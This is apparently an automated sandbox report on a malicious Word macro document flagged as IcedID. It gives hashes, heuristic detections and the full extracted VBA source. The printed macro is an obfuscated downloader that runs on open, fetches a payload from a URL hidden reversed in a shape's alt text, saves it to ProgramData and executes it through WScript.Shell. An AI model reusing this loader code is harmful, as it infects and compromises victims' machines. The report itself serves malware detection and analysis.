Office (OOXML) malware analysis — malicious · c995ba6a5daad73d

MALICIOUS

Office (OOXML)

97.8 KB Created: 2020-10-13 10:39:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: f155882564963305fde023457072da9b SHA-1: 64582b78b3a39d103bbb73795b8ebab6aab9e8f7 SHA-256: c995ba6a5daad73d3fa56428bde9e9fdccbb09e7f9c1c7c3111be2cf705dd117

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set xapeb = CreateObject("Script" + SFocJ)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	12225 bytes
SHA-256: `38a9ddb32cc184f0addea6aae3c3922c8cfbdc75411eba7b812d41fa5141eba8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "qKlAh" Sub Pwibp(VKjGS, Optional ByVal WajAN As String = "c:\programdata\CCbhU.txt", Optional ByVal SFocJ As String = "ing.FileSystemObject") ' Rector derivable innermost mutants ' Sprouts wholly ' Requiring exasperate ' Venereal shorewards ' Accelerated categories polling ' Scalp prolonged ' Vice diversities homelands endogenous moated ' Pourable community metabolism acid roundels surround ' Medication soso ' Crossexamination ' Tarnish smokiest ' Clearway vulnerabilities thronged ' Disposer shiniest forbear ' Mendel profuseness Set xapeb = CreateObject("Script" + SFocJ) ' Gloriously correction scruples bacon ' Symbolical intend fenced resumption tramlines ' Outbuildings thugs integers impishness ' Valuing dungbeetle heighten throats inscriptions ' Pupated conflictual skidding nodal privates ' Whippet phrases investors defies Set VdDdP = xapeb.CreateTextFile(WajAN) ' Chafes elongated scalp robins ' Defaulters collier ' Verdure ' Tiller marchioness neighbourhood hussies VdDdP.WriteLine VKjGS ' Nattering swearer ' Inventory stick unaffectedly edgewise inefficiencies unclouded ' Freestanding quadrangles phylogenetic ' Dispute ' Soundless ' Rampages ravaging regrettably punitive VdDdP.Close ' Lowly illiquid candidature purists fishhook retiring ' Choker ponies hull hating ' Subsiding begat deepfried smallmindedness ' Dashed lamplighter mission ' Relate waifs domain ' Ginseng associativity ' Decant whom shelved ignorantly ' Slice groaned ' Questionings ' Supercharged ' Freshens ' Hesitates ' Beets soak ' Miscellany earthwork demystify contain ' Unreal ' Quaggas irrelevance ordinariness ' Monocled semantic demolished depressive smalltalk ' Chamber accepts indulgent ' Porns okapi fought incomparably snuffed ' Occurred carrion friendliest fostered ' Robberies intended darter imprecisely amnesic ' Emissions lathe ' Redrafted motioning grapevine uncertainly discretely ' Certainties arranged benjamin dispiriting literacy ionise ' Effrontery monopolistic embarks futurism economies said ' Administer snakes demilitarisation ' Plush tuner boardings notable conifer stormier ' Massacre barged insecticidal rubric ' Solaces corneal repertory ' Hydroponically stoppered hauled ventilated ' Pocketing realms bushland ' Pavements dispiritedly repents ' Mores polyester cesspool defensive liquefaction heroical ' Nightclothes misspelling ' Deciduous spayed goldfish ' Fundholders sniffs exonerates wakened ' Choirmaster touristic judicature End Sub ' Spurts frontier mumblings seclusion ' Interatomic interplay musicologists thorough player ' Involution impaired fairest excused duels ' Molecular protectorates beefs ' Above starting braise outcome Sub AutoOpen() ' Naturist deans solfa chromosomes variegated emaciate ' Geese gobbled fad welt ' Compensated holler topologies ' Denigration frankincense crystallography ' Concubine interminable normandy relinquished fearsomely ' Relabelled arcadia clippers ' Naiads phrasebook ' Sables decorative ' Interferences caustics gypsies ' Bondage thrives penalise posted conspicuously ' Biggest humours planets insinuatingly ' Bum detains superior aviator ' Contiguously hexed ' Cessations intertidal ' Cormorant kriegspiel minuscule ' Improvises ' Hydrologists sanely emplacements ' Bergs finalist affinity ' Protestors docked anniversary ushered ' Telesales fertilisers ' Nincompoop circumventions irrationality pluralising flirted ' Headnote metaphysics corroding ' Venose louver ' Ministry psycholinguists ' Moaners butlers ' Mobster ruction ' Inclined conformists downwards allure Dim qfHdc As New iekTC ' Raced cocaine reproaches ' Pranksters geoscientific deviously ' Collection clump restrictive ' Straps straying detrimental ' Feverish formalise alloyed ' Flubbed ostlers antiquary VKjGS = qfHdc.qyItw("MSXML2.serverXMLHTTP") ' Inclinations wharves breathlessly ' Unionists immobilises ' Gunsmiths xhosa receivership ' Broking prays hint ' Asymmetry Pwibp oHFrs(VKjGS) ' Trusty despatch regina ' Rockets dimension ' Reborn deflatable ' Secretly ' Frightening shareholding greys ' Extendable unnoted beards run ' Amplify breeders cheered lowest mater ' Impressive outposts wriggles ' Moors secede nips secretly tiro ' Cushioning punishing ' Deuces conundrums ' Scarify papa catguts ' Strangulation escapes unregenerate TSAAx ICfFi(0) + "vr32 c:\programdata\CCbhU.txt", "ws" End Sub Function OSvvN(BRlFd, VvSOM) ' Conservations brightest ' Clappers unwinding collectables dermis ' Laughably functionalist discussable ambushing fad ' Flushes epitaph kleptomania scrawled ' Nutmegs adverted tincan colourings OSvvN = Split(BRlFd, VvSOM) End Function Attribute VB_Name = "Ozgaj" ' Marshalled reappointment ' Sating culinary kiddie ' Glutinous byways blender breach judas ' Hydrazine candidatures laity Function oHFrs(iVxSg) ' Limber boomerangs retaking ' Reverberations streets craggy proves segregates ' Radiography destined resistive hectically ' Perplexities abjure derivable sandbanks ' Alliteration blackness protestations foregoing clinches ' Temporally ' Casual path evidences ' Comparable revere retraining oHFrs = StrConv(iVxSg, vbUnicode) ' Exogenous ' Undid hawker ' Debunks saleable auspicious ' Protegees protectionist townscape ' Sponginess eyewash ' Nestable contemplation school coupler End Function ' Cheesy allowable franchisee outdated ' Therapies conscript dog keystroke uncorrectable ' Preachers charioteer closeness gaggle wellmannered magical cyclones ' Unrecognised beautifies ' Suggested libretto lithe procrastinators pacifier bolivia guardroom alder Function QanMi() ' Shirts racier knob ' Tars resits chins ' Trice dado bop ' Toilet zero pipeline pensiveness ' Kiosks cone coffin ' Implies ' Soothed unfurnished sublimation admiring ' Iconographical gainsaying ' Diagram ' Presidency scatological outlets ' Amps malarial benefit bodywork With ActiveDocument.shapes(1) QanMi = .AlternativeText End With End Function ' Unworn paraquat seacow wasteland ' Characters sadism elicit citizenry mouthpieces ' Burners absorbency reading narrated sainthood ' Wearing easels typical gender newness ' Sternest Function ICfFi(PzDPu) ' Aright foliated agitated unselfconscious accelerating ' Suicidal impending ' Windbag ' Verona taxis middlesized conakry ' Blueberry persian warps ' Euphemistically polarising averaging celebratory alerts ' Spiritualism receptive intuited ' Fracas ' Reassigning cloakroom rickety ligaments profanity scissor pYuqx = QanMi() QDmib = OSvvN(pYuqx, "###") rWnQw = QDmib(PzDPu) ICfFi = rWnQw End Function Attribute VB_Name = "iekTC" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Wheeze ' Numbly distributing shamelessness quiets initialises ' Declination toxins pluto ' Adumbrated weird tony competently nightwear ' Prepays representation recompute bounces ' Monkfish emotionality lethally multimillion Function qyItw(HAycs) ' Aldehyde breadfruit collapsed ' Reactors acrobats bilabial ' Twinkled priests peacemakers midafternoon antiquarians ' Pianissimo ' Wallchart implicating ' Binomial hooted animators ' Bong singularity ' Miscounting tunisian Dim CfTyi As Object ' Impale guardhouse slice biped stagnancy ' Unpredicted wheedle corroborate ' Gaoled inconsiderately unlisted ' Takeover refrigerate southernmost bitterness moorland vivified redhead ' Siblings catechisms toast ' Integer tenant predecessors lieu recipients bantering ' Zestfully spooling burp improvidence ' Internalise ' Distinguish ' Cogency ' Authorisations xhosa urgency ' Threatening concentrated foghorn ingenious ' Psychoanalytic fullblooded abolitionists ' Attribution postponement papaws Set CfTyi = CreateObject(HAycs) ' Codices audio muzzles whelp undivided ' Syntax apparatuses politic ibex ' Immunologist chipmunk ' Flanked apropos ' Peals dungarees skews drunkards constraining ' Resurgent pungency electrically coppice fieldwork ' Opportunistic booting stalemates ' Clown cobwebby recommences outbreaks dice ' Powersharing ' Eked expeditious inexcusably releases ' Trawls domineered renovated ' Simulate sects copses porthole deceived ' James flexor hymens officiated ' Hilarity unquote earthworms rest ' Chaplain songwriter zithers exclamations ' Hoists peninsular dropouts cheats ponderous cravenly ' Uruguay extrapolations attainable primarily ' Oracle envisioned ' Remediable bides replicable ' Stepfather detesting befitting ' Excommunication smother ' Fontanel abnormalities ' Thespian knocks ' Forwarding operand outrank peacock cdcRr = ICfFi(1) ' Bequests ' Revamped gormless curse harpoon draping unquestioning ' Buffeted ' Bolsters ' Venues gymnasts airraid sorrier flute gadfly unethical CfTyi.Open "GET", Reverse(cdcRr), False ' Protrusion dons hailstorm billets sixfold ' Troikas fissures adventuring permeate ' Misshapen smelter waggery ' Fibber ' Accountancy CfTyi.Send ' Church interrelationships regeneration backchat reigning ' Sunbed pantheon simulate simulate display ' Dirties indoctrinates salamanders matured gleaned ' Bookshops wooed befuddle ' Garter hireling midst qyItw = CfTyi.responsebody End Function Attribute VB_Name = "nkmqO" Sub TSAAx(ZGDzM, oDrTi) ' Pantographs ' Honeycombed alighted beaker ' Endowment boy fixings thrushes bosnia ' Changeovers spats rendering eludes repaying ' Fiat ' Blurs rejuvenations infallibly infancy ' Emigrant quartzite Set OkIJM = CreateObject(oDrTi + "cript.shell") ' Watchfully wrongly repose sociability gel ' Infirmities reporter secretions theoreticians eisteddfod ' Awaits disassociated ' Amass seasoned ' Backpedalling pathogenesis ivories rivalling ' Trample ' Tensile becoming romance baronesses plantain ' Hobgoblins careerism horsey frisking kebabs ' Unnoticeable ' Baldness cypress ' Contemptuous benefits ' Parodies spliced derivative ' Eddy falter scriptorium ' Halftruth amalgamation lashes maldives protozoan ' Consecrating westernisation compassionately smoothtongued backing ' Prestidigitatorial homemade touchy ' Numismatics manifold ripped turtleneck ' Molesting meiotic ' Motliest parses ' Pits diagram blabbed hysterectomy ' Aloneness ' Contrivances obliterate ruinous command judicature ' Metamorphic cleanse fiord soapbox ' Impermanence chariot ' Components ' Digit bookseller decilitre railway ' Smother liveliest ' Unthinkably perinatal ' Deteriorates ' Redder ' Mounds croup unmanageably ' Smalltown outhouse speaks swampier resounded ' Tyrannous outstations jaguars unwontedly impersonator ' Tin limekiln vibrantly ' Occurring billboards identifying councils ' Dentist yummy inebriation tattooing purist ' Headwind revenge devalues tahr diagnostic syllogisms childishness ' Fluid deltoid staple ' Charms detested complexities characteristically christenings ' Drowns extortionists deliverance ' Clinic dermic foodstuff wiggler ' Illadvised coder reprimanding ' Reflectivity undermanned ' Tipping intransigent landlady ' Posted excavated gustier accusals lumbered opprobrious ' Indexer patents gumboil coin ' Bibliographies OkIJM.exec ZGDzM ' Scoot powerboat belittling ' Lateness culls cursive consented ' Choruses irresponsible ' Beermats ' Impassively inject mystifies ' Massaging ' Coffins enthusiasm End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	45056 bytes
SHA-256: `0f871f666b329e4c0dc7a1dc40e40dd77be5334d3c5bcb7cc0df8db3f973b639`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.